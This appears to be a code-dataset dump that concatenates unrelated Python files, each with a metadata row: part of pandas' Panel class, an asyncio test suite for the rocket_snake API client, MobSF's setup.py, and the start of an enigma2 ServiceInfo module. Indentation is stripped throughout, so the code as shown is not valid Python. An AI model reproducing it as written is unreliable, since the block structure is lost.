having a certain amount of NA data
how : {'all', 'any'}, default 'any'
'any': one or more values are NA in the DataFrame along the
axis. For 'all' they all must be.
inplace : bool, default False
If True, do operation inplace and return None.
Returns
-------
dropped : Panel
"""
axis = self._get_axis_number(axis)
values = self.values
mask = notna(values)
for ax in reversed(sorted(set(range(self._AXIS_LEN)) - {axis})):
mask = mask.sum(ax)
per_slice = np.prod(values.shape[:axis] + values.shape[axis + 1:])
if how == 'all':
cond = mask > 0
else:
cond = mask == per_slice
new_ax = self._get_axis(axis)[cond]
result = self.reindex_axis(new_ax, axis=axis)
if inplace:
self._update_inplace(result)
else:
return result
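# Illustrative sketch (hypothetical panel p): p.dropna(axis=1, how='any')
# removes every major_axis label whose items x minor_axis slice contains at
# least one NA value, while how='all' removes a label only when the whole
# slice is NA.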
def _combine(self, other, func, axis=0):
if isinstance(other, Panel):
return self._combine_panel(other, func)
elif isinstance(other, DataFrame):
return self._combine_frame(other, func, axis=axis)
elif is_scalar(other):
return self._combine_const(other, func)
else:
raise NotImplementedError(
"{otype!s} is not supported in combine operation with "
"{selftype!s}".format(otype=type(other), selftype=type(self)))
def _combine_const(self, other, func):
with np.errstate(all='ignore'):
new_values = func(self.values, other)
d = self._construct_axes_dict()
return self._constructor(new_values, **d)
def _combine_frame(self, other, func, axis=0):
index, columns = self._get_plane_axes(axis)
axis = self._get_axis_number(axis)
other = other.reindex(index=index, columns=columns)
with np.errstate(all='ignore'):
if axis == 0:
new_values = func(self.values, other.values)
elif axis == 1:
new_values = func(self.values.swapaxes(0, 1), other.values.T)
new_values = new_values.swapaxes(0, 1)
elif axis == 2:
new_values = func(self.values.swapaxes(0, 2), other.values)
new_values = new_values.swapaxes(0, 2)
return self._constructor(new_values, self.items, self.major_axis,
self.minor_axis)
def _combine_panel(self, other, func):
items = self.items.union(other.items)
major = self.major_axis.union(other.major_axis)
minor = self.minor_axis.union(other.minor_axis)
# could check that everything's the same size, but forget it
this = self.reindex(items=items, major=major, minor=minor)
other = other.reindex(items=items, major=major, minor=minor)
with np.errstate(all='ignore'):
result_values = func(this.values, other.values)
return self._constructor(result_values, items, major, minor)
def major_xs(self, key):
"""
Return slice of panel along major axis.
Parameters
----------
key : object
Major axis label
Returns
-------
y : DataFrame
index -> minor axis, columns -> items
Notes
-----
major_xs is only for getting, not setting values.
MultiIndex Slicers is a generic way to get/set values on any level or
levels and is a superset of major_xs functionality, see
:ref:`MultiIndex Slicers <advanced.mi_slicers>`
"""
return self.xs(key, axis=self._AXIS_LEN - 2)
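# Illustrative sketch (hypothetical panel p): p.major_xs(p.major_axis[0])
# returns the DataFrame for that major_axis label, indexed by the minor_axis
# with the items as columns; minor_xs below is the analogous slice along the
# minor axis.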
def minor_xs(self, key):
"""
Return slice of panel along minor axis.
Parameters
----------
key : object
Minor axis label
Returns
-------
y : DataFrame
index -> major axis, columns -> items
Notes
-----
minor_xs is only for getting, not setting values.
MultiIndex Slicers is a generic way to get/set values on any level or
levels and is a superset of minor_xs functionality, see
:ref:`MultiIndex Slicers <advanced.mi_slicers>`
"""
return self.xs(key, axis=self._AXIS_LEN - 1)
def xs(self, key, axis=1):
"""
Return slice of panel along selected axis.
Parameters
----------
key : object
Label
axis : {'items', 'major', 'minor'}, default 1/'major'
Returns
-------
y : ndim(self)-1
Notes
-----
xs is only for getting, not setting values.
MultiIndex Slicers is a generic way to get/set values on any level or
levels and is a superset of xs functionality, see
:ref:`MultiIndex Slicers <advanced.mi_slicers>`
"""
axis = self._get_axis_number(axis)
if axis == 0:
return self[key]
self._consolidate_inplace()
axis_number = self._get_axis_number(axis)
new_data = self._data.xs(key, axis=axis_number, copy=False)
result = self._construct_return_type(new_data)
copy = new_data.is_mixed_type
result._set_is_copy(self, copy=copy)
return result
_xs = xs
def _ixs(self, i, axis=0):
"""
Parameters
----------
i : int, slice, or sequence of integers
axis : int
"""
ax = self._get_axis(axis)
key = ax[i]
# xs cannot handle a non-scalar key, so just reindex here
# if we have a multi-index and a single tuple, then its a reduction
# (GH 7516)
if not (isinstance(ax, MultiIndex) and isinstance(key, tuple)):
if is_list_like(key):
indexer = {self._get_axis_name(axis): key}
return self.reindex(**indexer)
# a reduction
if axis == 0:
values = self._data.iget(i)
return self._box_item_values(key, values)
# xs by position
self._consolidate_inplace()
new_data = self._data.xs(i, axis=axis, copy=True, takeable=True)
return self._construct_return_type(new_data)
def groupby(self, function, axis='major'):
"""
Group data on given axis, returning GroupBy object.
Parameters
----------
function : callable
Mapping function applied along the chosen axis
axis : {'major', 'minor', 'items'}, default 'major'
Returns
-------
grouped : PanelGroupBy
"""
from pandas.core.groupby import PanelGroupBy
axis = self._get_axis_number(axis)
return PanelGroupBy(self, function, axis=axis)
def to_frame(self, filter_observations=True):
"""
Transform wide format into long (stacked) format as DataFrame whose
columns are the Panel's items and whose index is a MultiIndex formed
of the Panel's major and minor axes.
Parameters
----------
filter_observations : boolean, default True
Drop (major, minor) pairs without a complete set of observations
across all the items
Returns
-------
y : DataFrame
"""
_, N, K = self.shape
if filter_observations:
# shaped like the return DataFrame
mask = notna(self.values).all(axis=0)
# size = mask.sum()
selector = mask.ravel()
else:
# size = N * K
selector = slice(None, None)
data = {item: self[item].values.ravel()[selector]
for item in self.items}
def construct_multi_parts(idx, n_repeat, n_shuffle=1):
# Replicates and shuffles MultiIndex, returns individual attributes
codes = [np.repeat(x, n_repeat) for x in idx.codes]
# Assumes that each label is divisible by n_shuffle
codes = [x.reshape(n_shuffle, -1).ravel(order='F')
for x in codes]
codes = [x[selector] for x in codes]
levels = idx.levels
names = idx.names
return codes, levels, names
def construct_index_parts(idx, major=True):
levels = [idx]
if major:
codes = [np.arange(N).repeat(K)[selector]]
names = idx.name or 'major'
else:
codes = np.arange(K).reshape(1, K)[np.zeros(N, dtype=int)]
codes = [codes.ravel()[selector]]
names = idx.name or 'minor'
names = [names]
return codes, levels, names
if isinstance(self.major_axis, MultiIndex):
major_codes, major_levels, major_names = construct_multi_parts(
self.major_axis, n_repeat=K)
else:
major_codes, major_levels, major_names = construct_index_parts(
self.major_axis)
if isinstance(self.minor_axis, MultiIndex):
minor_codes, minor_levels, minor_names = construct_multi_parts(
self.minor_axis, n_repeat=N, n_shuffle=K)
else:
minor_codes, minor_levels, minor_names = construct_index_parts(
self.minor_axis, major=False)
levels = major_levels + minor_levels
codes = major_codes + minor_codes
names = major_names + minor_names
index = MultiIndex(levels=levels, codes=codes, names=names,
verify_integrity=False)
return DataFrame(data, index=index, columns=self.items)
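# Illustrative sketch (hypothetical panel p): p.to_frame() stacks the panel
# into a DataFrame whose rows are labelled by a (major_axis, minor_axis)
# MultiIndex and whose columns are the items; filter_observations=False keeps
# all N*K rows, including those that are entirely NA.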
def apply(self, func, axis='major', **kwargs):
"""
Applies function along axis (or axes) of the Panel.
Parameters
----------
func : function
Function to apply to each combination of 'other' axes
e.g. if axis = 'items', the combination of major_axis/minor_axis
will each be passed as a Series; if axis = ('items', 'major'),
DataFrames of items & major axis will be passed
axis : {'items', 'minor', 'major'}, or {0, 1, 2}, or a tuple with two
axes
Additional keyword arguments will be passed as keywords to the function
Returns
-------
result : Panel, DataFrame, or Series
Examples
--------
Returns a Panel with the square root of each element
>>> p = pd.Panel(np.random.rand(4, 3, 2)) # doctest: +SKIP
>>> p.apply(np.sqrt)
Equivalent to p.sum(1), returning a DataFrame
>>> p.apply(lambda x: x.sum(), axis=1) # doctest: +SKIP
Equivalent to previous:
>>> p.apply(lambda x: x.sum(), axis='major') # doctest: +SKIP
Return the shapes of each DataFrame over axis 2 (i.e the shapes of
items x major), as a Series
>>> p.apply(lambda x: x.shape, axis=(0,1)) # doctest: +SKIP
"""
if kwargs and not isinstance(func, np.ufunc):
f = lambda x: func(x, **kwargs)
else:
f = func
# 2d-slabs
if isinstance(axis, (tuple, list)) and len(axis) == 2:
return self._apply_2d(f, axis=axis)
axis = self._get_axis_number(axis)
# try ufunc like
if isinstance(f, np.ufunc):
try:
with np.errstate(all='ignore'):
result = np.apply_along_axis(func, axis, self.values)
return self._wrap_result(result, axis=axis)
except (AttributeError):
pass
# 1d
return self._apply_1d(f, axis=axis)
def _apply_1d(self, func, axis):
axis_name = self._get_axis_name(axis)
ndim = self.ndim
values = self.values
# iter thru the axes
slice_axis = self._get_axis(axis)
slice_indexer = [0] * (ndim - 1)
indexer = np.zeros(ndim, 'O')
indlist = list(range(ndim))
indlist.remove(axis)
indexer[axis] = slice(None, None)
indexer.put(indlist, slice_indexer)
planes = [self._get_axis(axi) for axi in indlist]
shape = np.array(self.shape).take(indlist)
# all the iteration points
points = cartesian_product(planes)
results = []
for i in range(np.prod(shape)):
# construct the object
pts = tuple(p[i] for p in points)
indexer.put(indlist, slice_indexer)
obj = Series(values[tuple(indexer)], index=slice_axis, name=pts)
result = func(obj)
results.append(result)
# increment the indexer
slice_indexer[-1] += 1
n = -1
while (slice_indexer[n] >= shape[n]) and (n > (1 - ndim)):
slice_indexer[n - 1] += 1
slice_indexer[n] = 0
n -= 1
# empty object
if not len(results):
return self._constructor(**self._construct_axes_dict())
# same ndim as current
if isinstance(results[0], Series):
arr = np.vstack([r.values for r in results])
arr = arr.T.reshape(tuple([len(slice_axis)] + list(shape)))
tranp = np.array([axis] + indlist).argsort()
arr = arr.transpose(tuple(list(tranp)))
return self._constructor(arr, **self._construct_axes_dict())
# ndim-1 shape
results = np.array(results).reshape(shape)
if results.ndim == 2 and axis_name != self._info_axis_name:
results = results.T
planes = planes[::-1]
return self._construct_return_type(results, planes)
def _apply_2d(self, func, axis):
"""
Handle 2-d slices, equiv to iterating over the other axis.
"""
ndim = self.ndim
axis = [self._get_axis_number(a) for a in axis]
# construct slabs, in 2-d this is a DataFrame result
indexer_axis = list(range(ndim))
for a in axis:
indexer_axis.remove(a)
indexer_axis = indexer_axis[0]
slicer = [slice(None, None)] * ndim
ax = self._get_axis(indexer_axis)
results = []
for i, e in enumerate(ax):
slicer[indexer_axis] = i
sliced = self.iloc[tuple(slicer)]
obj = func(sliced)
results.append((e, obj))
return self._construct_return_type(dict(results))
def _reduce(self, op, name, axis=0, skipna=True, numeric_only=None,
filter_type=None, **kwds):
if numeric_only:
raise NotImplementedError('Panel.{0} does not implement '
'numeric_only.'.format(name))
if axis is None and filter_type == 'bool':
# labels = None
# constructor = None
axis_number = None
axis_name = None
else:
# TODO: Make other agg func handle axis=None properly
axis = self._get_axis_number(axis)
# labels = self._get_agg_axis(axis)
# constructor = self._constructor
axis_name = self._get_axis_name(axis)
axis_number = self._get_axis_number(axis_name)
f = lambda x: op(x, axis=axis_number, skipna=skipna, **kwds)
with np.errstate(all='ignore'):
result = f(self.values)
if axis is None and filter_type == 'bool':
return np.bool_(result)
axes = self._get_plane_axes(axis_name)
if result.ndim == 2 and axis_name != self._info_axis_name:
result = result.T
return self._construct_return_type(result, axes)
def _construct_return_type(self, result, axes=None):
"""
Return the type for the ndim of the result.
"""
ndim = getattr(result, 'ndim', None)
# need to assume they are the same
if ndim is None:
if isinstance(result, dict):
ndim = getattr(list(compat.itervalues(result))[0], 'ndim', 0)
# have a dict, so top-level is +1 dim
if ndim != 0:
ndim += 1
# scalar
if ndim == 0:
return Series(result)
# same as self
elif self.ndim == ndim:
# return the construction dictionary for these axes
if axes is None:
return self._constructor(result)
return self._constructor(result, **self._construct_axes_dict())
# sliced
elif self.ndim == ndim + 1:
if axes is None:
return self._constructor_sliced(result)
return self._constructor_sliced(
result, **self._extract_axes_for_slice(self, axes))
raise ValueError('invalid _construct_return_type [self->{self}] '
'[result->{result}]'.format(self=self, result=result))
def _wrap_result(self, result, axis):
axis = self._get_axis_name(axis)
axes = self._get_plane_axes(axis)
if result.ndim == 2 and axis != self._info_axis_name:
result = result.T
return self._construct_return_type(result, axes)
@Substitution(**_shared_doc_kwargs)
@Appender(NDFrame.reindex.__doc__)
def reindex(self, *args, **kwargs):
major = kwargs.pop("major", None)
minor = kwargs.pop('minor', None)
if major is not None:
if kwargs.get("major_axis"):
raise TypeError("Cannot specify both 'major' and 'major_axis'")
kwargs['major_axis'] = major
if minor is not None:
if kwargs.get("minor_axis"):
raise TypeError("Cannot specify both 'minor' and 'minor_axis'")
kwargs['minor_axis'] = minor
axes = validate_axis_style_args(self, args, kwargs, 'labels',
'reindex')
kwargs.update(axes)
kwargs.pop('axis', None)
kwargs.pop('labels', None)
with warnings.catch_warnings():
warnings.simplefilter("ignore", FutureWarning)
# do not warn about constructing Panel when reindexing
result = super(Panel, self).reindex(**kwargs)
return result
@Substitution(**_shared_doc_kwargs)
@Appender(NDFrame.rename.__doc__)
def rename(self, items=None, major_axis=None, minor_axis=None, **kwargs):
major_axis = (major_axis if major_axis is not None else
kwargs.pop('major', None))
minor_axis = (minor_axis if minor_axis is not None else
kwargs.pop('minor', None))
return super(Panel, self).rename(items=items, major_axis=major_axis,
minor_axis=minor_axis, **kwargs)
@Appender(_shared_docs['reindex_axis'] % _shared_doc_kwargs)
def reindex_axis(self, labels, axis=0, method=None, level=None, copy=True,
limit=None, fill_value=np.nan):
return super(Panel, self).reindex_axis(labels=labels, axis=axis,
method=method, level=level,
copy=copy, limit=limit,
fill_value=fill_value)
@Substitution(**_shared_doc_kwargs)
@Appender(NDFrame.transpose.__doc__)
def transpose(self, *args, **kwargs):
# check if a list of axes was passed in instead as a
# single *args element
if (len(args) == 1 and hasattr(args[0], '__iter__') and
not is_string_like(args[0])):
axes = args[0]
else:
axes = args
if 'axes' in kwargs and axes:
raise TypeError("transpose() got multiple values for "
"keyword argument 'axes'")
elif not axes:
axes = kwargs.pop('axes', ())
return super(Panel, self).transpose(*axes, **kwargs)
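# Illustrative sketch (hypothetical panel p): the axes may be given either
# positionally, e.g. p.transpose(2, 0, 1), or as a single iterable such as
# p.transpose(['minor_axis', 'items', 'major_axis']); combining an 'axes'
# keyword with positional axes raises TypeError, as handled above.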
@Substitution(**_shared_doc_kwargs)
@Appender(NDFrame.fillna.__doc__)
def fillna(self, value=None, method=None, axis=None, inplace=False,
limit=None, downcast=None, **kwargs):
return super(Panel, self).fillna(value=value, method=method, axis=axis,
inplace=inplace, limit=limit,
downcast=downcast, **kwargs)
def count(self, axis='major'):
"""
Return number of observations over requested axis.
Parameters
----------
axis : {'items', 'major', 'minor'} or {0, 1, 2}
Returns
-------
count : DataFrame
"""
i = self._get_axis_number(axis)
values = self.values
mask = np.isfinite(values)
result = mask.sum(axis=i, dtype='int64')
return self._wrap_result(result, axis)
def shift(self, periods=1, freq=None, axis='major'):
"""
Shift index by desired number of periods with an optional time freq.
The shifted data will not include the dropped periods and the
shifted axis will be smaller than the original. This is different
from the behavior of DataFrame.shift()
Parameters
----------
periods : int
Number of periods to move, can be positive or negative
freq : DateOffset, timedelta, or time rule string, optional
axis : {'items', 'major', 'minor'} or {0, 1, 2}
Returns
-------
shifted : Panel
"""
if freq:
return self.tshift(periods, freq, axis=axis)
return super(Panel, self).slice_shift(periods, axis=axis)
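# Illustrative sketch (hypothetical panel p): p.shift(2) drops two labels from
# the major_axis, so the shifted panel is shorter than the original; this
# differs from DataFrame.shift, which keeps the length and introduces NaNs.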
def tshift(self, periods=1, freq=None, axis='major'):
return super(Panel, self).tshift(periods, freq, axis)
def join(self, other, how='left', lsuffix='', rsuffix=''):
"""
Join items with another Panel on the major and minor axes.
Parameters
----------
other : Panel or list of Panels
Index should be similar to one of the columns in this one
how : {'left', 'right', 'outer', 'inner'}
How to handle indexes of the two objects. Default: 'left'
for joining on index, None otherwise
* left: use calling frame's index
* right: use input frame's index
* outer: form union of indexes
* inner: use intersection of indexes
lsuffix : string
Suffix to use from left frame's overlapping columns
rsuffix : string
Suffix to use from right frame's overlapping columns
Returns
-------
joined : Panel
"""
from pandas.core.reshape.concat import concat
if isinstance(other, Panel):
join_major, join_minor = self._get_join_index(other, how)
this = self.reindex(major=join_major, minor=join_minor)
other = other.reindex(major=join_major, minor=join_minor)
merged_data = this._data.merge(other._data, lsuffix, rsuffix)
return self._constructor(merged_data)
else:
if lsuffix or rsuffix:
raise ValueError('Suffixes not supported when passing '
'multiple panels')
if how == 'left':
how = 'outer'
join_axes = [self.major_axis, self.minor_axis]
elif how == 'right':
raise ValueError('Right join not supported with multiple '
'panels')
else:
join_axes = None
return concat([self] + list(other), axis=0, join=how,
join_axes=join_axes, verify_integrity=True)
@deprecate_kwarg(old_arg_name='raise_conflict', new_arg_name='errors',
mapping={False: 'ignore', True: 'raise'})
def update(self, other, join='left', overwrite=True, filter_func=None,
errors='ignore'):
"""
Modify Panel in place using non-NA values from other Panel.
May also use object coercible to Panel. Will align on items.
Parameters
----------
other : Panel, or object coercible to Panel
The object from which the caller will be updated.
join : {'left', 'right', 'outer', 'inner'}, default 'left'
How individual DataFrames are joined.
overwrite : bool, default True
If True then overwrite values for common keys in the calling Panel.
filter_func : callable(1d-array) -> 1d-array<bool>, default None
Can choose to replace values other than NA. Return True for values
that should be updated.
errors : {'raise', 'ignore'}, default 'ignore'
If 'raise', will raise an error if a DataFrame and other both
contain non-NA data in the same place.
.. versionchanged:: 0.24.0
Changed from `raise_conflict=False|True`
to `errors='ignore'|'raise'`.
See Also
--------
DataFrame.update : Similar method for DataFrames.
dict.update : Similar method for dictionaries.
"""
if not isinstance(other, self._constructor):
other = self._constructor(other)
axis_name = self._info_axis_name
axis_values = self._info_axis
other = other.reindex(**{axis_name: axis_values})
for frame in axis_values:
self[frame].update(other[frame], join=join, overwrite=overwrite,
filter_func=filter_func, errors=errors)
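# Illustrative sketch (hypothetical panels p1, p2): p1.update(p2) aligns p2 on
# p1's items and then calls DataFrame.update frame by frame, so by default the
# non-NA values of p2 overwrite the corresponding values of p1 in place.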
def _get_join_index(self, other, how):
if how == 'left':
join_major, join_minor = self.major_axis, self.minor_axis
elif how == 'right':
join_major, join_minor = other.major_axis, other.minor_axis
elif how == 'inner':
join_major = self.major_axis.intersection(other.major_axis)
join_minor = self.minor_axis.intersection(other.minor_axis)
elif how == 'outer':
join_major = self.major_axis.union(other.major_axis)
join_minor = self.minor_axis.union(other.minor_axis)
return join_major, join_minor
# miscellaneous data creation
@staticmethod
def _extract_axes(self, data, axes, **kwargs):
"""
Return a list of the axis indices.
"""
return [self._extract_axis(self, data, axis=i, **kwargs)
for i, a in enumerate(axes)]
@staticmethod
def _extract_axes_for_slice(self, axes):
"""
Return the slice dictionary for these axes.
"""
return {self._AXIS_SLICEMAP[i]: a for i, a in
zip(self._AXIS_ORDERS[self._AXIS_LEN - len(axes):], axes)}
@staticmethod
def _prep_ndarray(self, values, copy=True):
if not isinstance(values, np.ndarray):
values = np.asarray(values)
# NumPy strings are a pain, convert to object
if issubclass(values.dtype.type, compat.string_types):
values = np.array(values, dtype=object, copy=True)
else:
if copy:
values = values.copy()
if values.ndim != self._AXIS_LEN:
raise ValueError("The number of dimensions required is {0}, "
"but the number of dimensions of the "
"ndarray given was {1}".format(self._AXIS_LEN,
values.ndim))
return values
@staticmethod
def _homogenize_dict(self, frames, intersect=True, dtype=None):
"""
Conform set of _constructor_sliced-like objects to either
an intersection of indices / columns or a union.
Parameters
----------
frames : dict
intersect : boolean, default True
Returns
-------
dict of aligned results & indices
"""
result = dict()
# the caller may pass a dict or an OrderedDict; preserve that type
if isinstance(frames, OrderedDict):
result = OrderedDict()
adj_frames = OrderedDict()
for k, v in compat.iteritems(frames):
if isinstance(v, dict):
adj_frames[k] = self._constructor_sliced(v)
else:
adj_frames[k] = v
axes = self._AXIS_ORDERS[1:]
axes_dict = {a: ax for a, ax in zip(axes, self._extract_axes(
self, adj_frames, axes, intersect=intersect))}
reindex_dict = {self._AXIS_SLICEMAP[a]: axes_dict[a] for a in axes}
reindex_dict['copy'] = False
for key, frame in compat.iteritems(adj_frames):
if frame is not None:
result[key] = frame.reindex(**reindex_dict)
else:
result[key] = None
axes_dict['data'] = result
axes_dict['dtype'] = dtype
return axes_dict
@staticmethod
def _extract_axis(self, data, axis=0, intersect=False):
index = None
if len(data) == 0:
index = Index([])
elif len(data) > 0:
raw_lengths = []
have_raw_arrays = False
have_frames = False
for v in data.values():
if isinstance(v, self._constructor_sliced):
have_frames = True
elif v is not None:
have_raw_arrays = True
raw_lengths.append(v.shape[axis])
if have_frames:
# we want the "old" behavior here, of sorting only
# 1. we're doing a union (intersect=False)
# 2. the indices are not aligned.
index = _get_objs_combined_axis(data.values(), axis=axis,
intersect=intersect, sort=None)
if have_raw_arrays:
lengths = list(set(raw_lengths))
if len(lengths) > 1:
raise ValueError('ndarrays must match shape on '
'axis {ax}'.format(ax=axis))
if have_frames:
if lengths[0] != len(index):
raise AssertionError('Length of data and index must match')
else:
index = Index(np.arange(lengths[0]))
if index is None:
index = Index([])
return ensure_index(index)
def sort_values(self, *args, **kwargs):
"""
NOT IMPLEMENTED: do not call this method, as sorting values is not
supported for Panel objects and will raise an error.
"""
super(Panel, self).sort_values(*args, **kwargs)
Panel._setup_axes(axes=['items', 'major_axis', 'minor_axis'], info_axis=0,
stat_axis=1, aliases={'major': 'major_axis',
'minor': 'minor_axis'},
slicers={'major_axis': 'index',
'minor_axis': 'columns'},
docs={})
ops.add_special_arithmetic_methods(Panel)
ops.add_flex_arithmetic_methods(Panel)
Panel._add_numeric_operations()
|
bsd-3-clause
| -7,667,139,979,059,347,000
| 34.208438
| 79
| 0.545581
| false
| 4.175267
| false
| false
| false
|
Drummersbrother/rocket-snake
|
tests/experiments.py
|
1
|
7041
|
import asyncio
import json
import time
import unittest
from pprint import pprint
import rocket_snake
with open("tests/config.json", "r") as config_file:
config = json.load(config_file)
def async_test(f):
def wrapper(*args, **kwargs):
future = f(*args, **kwargs)
loop = args[0].running_loop
loop.run_until_complete(future)
return wrapper
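# async_test turns a coroutine test method into a synchronous one: the wrapper
# builds the coroutine and runs it to completion on the test case's
# running_loop (args[0] is the TestCase instance).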
class AsyncTester(unittest.TestCase):
"""Test async code easily by inheriting from this."""
@staticmethod
def _do_async_code(coro):
return asyncio.get_event_loop().run_until_complete(coro)
def setUp(self, *args, **kwargs):
super().setUp()
self.running_loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.running_loop)
self.time_track_stack = []
def tearDown(self, *args, **kwargs):
super().tearDown()
if not self.running_loop.is_closed():
self.running_loop.close()
def time_track(self, text: object="Time taken was {0} seconds."):
if text is None:
self.time_track_stack.append(time.time())
else:
last_time = self.time_track_stack.pop()
time_delta = time.time() - last_time
print(text.format(round(time_delta, 3)))
return time_delta
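# time_track(None) pushes a start timestamp; a later call with a format string
# pops it, prints the elapsed seconds and returns the delta, so measurements
# can be nested via the internal stack.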
class Tester(AsyncTester):
def setUp(self, *args, **kwargs):
super().setUp(*args, **kwargs)
self.executed_requests = 0
async def do_multiple(self, func, times: int = 10, text: str = "Time taken was {0} seconds."):
self.time_track(None)
tasks = [func() for i in range(times)]
tasks = await asyncio.gather(*tasks, loop=asyncio.get_event_loop(), return_exceptions=False)
gather_time = self.time_track("Time taken for {0} gather tasks was ".format(times) + "{0} seconds.")
print("That means an average of {0} milliseconds per gather request.".format(
round(1000 * (gather_time / times), 1)))
total_series_time = 0
for i in range(times):
self.time_track(None)
await func()
total_series_time += self.time_track(text)
print("Time taken for {0} series tasks was {1} seconds.".format(times, round(total_series_time, 3)))
print("That means an average of {0} milliseconds per series request.".format(
round(1000 * (total_series_time / times), 1)))
return times * 2
@async_test
async def test_data_endpoints(self):
self.time_track(None)
print("Testing data endpoints.")
client = rocket_snake.RLS_Client(api_key=config["key"], auto_rate_limit=True)
print("Playlists:")
pprint(await client.get_playlists())
print("\nSeasons:")
pprint(await client.get_seasons())
print("\nPlatforms:")
pprint(await client.get_platforms())
print("\nTiers:")
pprint(await client.get_tiers())
print("\n")
self.executed_requests += 7
print("Done with testing data endpoints. Time taken was {0} seconds.".format(self.time_track("Time taken for data endpoints was {0} seconds.")))
@async_test
async def test_player_search(self):
self.time_track(None)
print("Testing player search.")
client = rocket_snake.RLS_Client(api_key=config["key"], auto_rate_limit=True)
pprint(await client.search_player("Mike", get_all=False))
print("Done with testing player search. Time taken was {0} seconds.".format(self.time_track("Time taken for player search was {0} seconds.")))
@async_test
async def test_player_endpoints(self):
self.time_track(None)
print("Testing player endpoints.")
client = rocket_snake.RLS_Client(api_key=config["key"], auto_rate_limit=True)
pprint(await client.search_player("Mike", get_all=False))
print("Me:")
self.time_track(None)
print(str(await client.get_player(config["steam_ids"][0], rocket_snake.constants.STEAM)))
self.time_track("Time taken for single player was {0} seconds.")
print("Loads a people:")
self.time_track(None)
pprint(await client.get_players(
list(zip(config["steam_ids"], [rocket_snake.constants.STEAM] * len(config["steam_ids"])))))
self.time_track("Time taken for batch players was {0} seconds.")
print("Done with testing player endpoints. Time taken was {0} seconds.§".format(self.time_track("Time taken for player endpoints was {0} seconds.")))
@async_test
async def test_platforms_throughput(self):
self.time_track(None)
print("Testing platforms data throughput.")
client = rocket_snake.RLS_Client(api_key=config["key"], auto_rate_limit=True)
done_requests = await self.do_multiple(client.get_platforms, text="Platforms took {0} seconds.")
print("Done with platforms data throughput testing, {0} requests were executed. \nThat means an average of {1} milliseconds per request."
.format(done_requests, round(1000 * (self.time_track("Time taken for platforms data throughput was {0} seconds.") / done_requests), 1)))
@async_test
async def test_tiers_throughput(self):
self.time_track(None)
print("Testing tiers data throughput.")
client = rocket_snake.RLS_Client(api_key=config["key"], auto_rate_limit=True)
done_requests = await self.do_multiple(client.get_tiers, text="tiers took {0} seconds.")
print("Done with tiers data throughput testing, {0} requests were executed. \nThat means an average of {1} milliseconds per request."
.format(done_requests, round(1000 * (self.time_track("Time taken for tiers data throughput was {0} seconds.") / done_requests), 1)))
@async_test
async def test_seasons_throughput(self):
self.time_track(None)
print("Testing seasons data throughput.")
client = rocket_snake.RLS_Client(api_key=config["key"], auto_rate_limit=True)
done_requests = await self.do_multiple(client.get_seasons, text="seasons took {0} seconds.")
print("Done with seasons data throughput testing, {0} requests were executed. \nThat means an average of {1} milliseconds per request."
.format(done_requests, round(1000 * (self.time_track("Time taken for seasons data throughput was {0} seconds.") / done_requests), 1)))
@async_test
async def test_playlists_throughput(self):
self.time_track(None)
print("Testing playlists data throughput.")
client = rocket_snake.RLS_Client(api_key=config["key"], auto_rate_limit=True)
done_requests = await self.do_multiple(client.get_playlists, text="playlists took {0} seconds.")
print("Done with playlists data throughput testing, {0} requests were executed. \nThat means an average of {1} milliseconds per request."
.format(done_requests, round(1000 * (self.time_track("Time taken for playlists data throughput was {0} seconds.") / done_requests), 1)))
|
apache-2.0
| -4,465,343,280,217,194,500
| 37.26087
| 157
| 0.640767
| false
| 3.762694
| true
| false
| false
|
MobSF/Mobile-Security-Framework-MobSF
|
setup.py
|
1
|
1749
|
#!/usr/bin/env python3
"""Setup for MobSF."""
from setuptools import (
find_packages,
setup,
)
from pathlib import Path
def read(rel_path):
init = Path(__file__).resolve().parent / rel_path
return init.read_text('utf-8', 'ignore')
def get_version():
ver_path = 'mobsf/MobSF/init.py'
for line in read(ver_path).splitlines():
if line.startswith('VERSION'):
return line.split('\'')[1]
raise RuntimeError('Unable to find version string.')
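# get_version scans mobsf/MobSF/init.py for the first line starting with
# 'VERSION' and returns the value between the first pair of single quotes.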
description = (
'Mobile Security Framework (MobSF) is an automated,'
' all-in-one mobile application (Android/iOS/Windows) pen-testing,'
' malware analysis and security assessment framework capable of '
'performing static and dynamic analysis.')
setup(
name='mobsf',
version=get_version(),
description=description,
author='Ajin Abraham',
author_email='ajin25@gmail.com',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',
'Programming Language :: Python :: 3.8',
'Topic :: Security',
'Topic :: Software Development :: Quality Assurance',
],
packages=find_packages(include=[
'mobsf', 'mobsf.*',
]),
include_package_data=True,
python_requires='>=3.8,<=3.9',
entry_points={
'console_scripts': [
'mobsf = mobsf.__main__:main',
'mobsfdb = mobsf.__main__:db',
],
},
url='https://github.com/MobSF/Mobile-Security-Framework-MobSF',
long_description=read('README.md'),
long_description_content_type='text/markdown',
install_requires=Path('requirements.txt').read_text().splitlines(),
)
|
gpl-3.0
| -4,701,759,006,805,439,000
| 27.672131
| 75
| 0.621498
| false
| 3.729211
| false
| false
| false
|
eesatfan/vuplus-enigma2
|
lib/python/Screens/ServiceInfo.py
|
1
|
9869
|
from Components.HTMLComponent import HTMLComponent
from Components.GUIComponent import GUIComponent
from Screen import Screen
from Components.ActionMap import ActionMap
from Components.Label import Label
from ServiceReference import ServiceReference
from enigma import eListboxPythonMultiContent, eListbox, gFont, iServiceInformation, eServiceCenter
from Tools.Transponder import ConvertToHumanReadable
RT_HALIGN_LEFT = 0
TYPE_TEXT = 0
TYPE_VALUE_HEX = 1
TYPE_VALUE_DEC = 2
TYPE_VALUE_HEX_DEC = 3
TYPE_SLIDER = 4
def to_unsigned(x):
return x & 0xFFFFFFFF
def ServiceInfoListEntry(a, b, valueType=TYPE_TEXT, param=4):
print "b:", b
if not isinstance(b, str):
if valueType == TYPE_VALUE_HEX:
b = ("0x%0" + str(param) + "x") % to_unsigned(b)
elif valueType == TYPE_VALUE_DEC:
b = str(b)
elif valueType == TYPE_VALUE_HEX_DEC:
b = ("0x%0" + str(param) + "x (%dd)") % (to_unsigned(b), b)
else:
b = str(b)
return [
#PyObject *type, *px, *py, *pwidth, *pheight, *pfnt, *pstring, *pflags;
(eListboxPythonMultiContent.TYPE_TEXT, 0, 0, 200, 30, 0, RT_HALIGN_LEFT, ""),
(eListboxPythonMultiContent.TYPE_TEXT, 0, 0, 200, 25, 0, RT_HALIGN_LEFT, a),
(eListboxPythonMultiContent.TYPE_TEXT, 220, 0, 350, 25, 0, RT_HALIGN_LEFT, b)
]
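# ServiceInfoListEntry builds one three-column row for the multi-content list:
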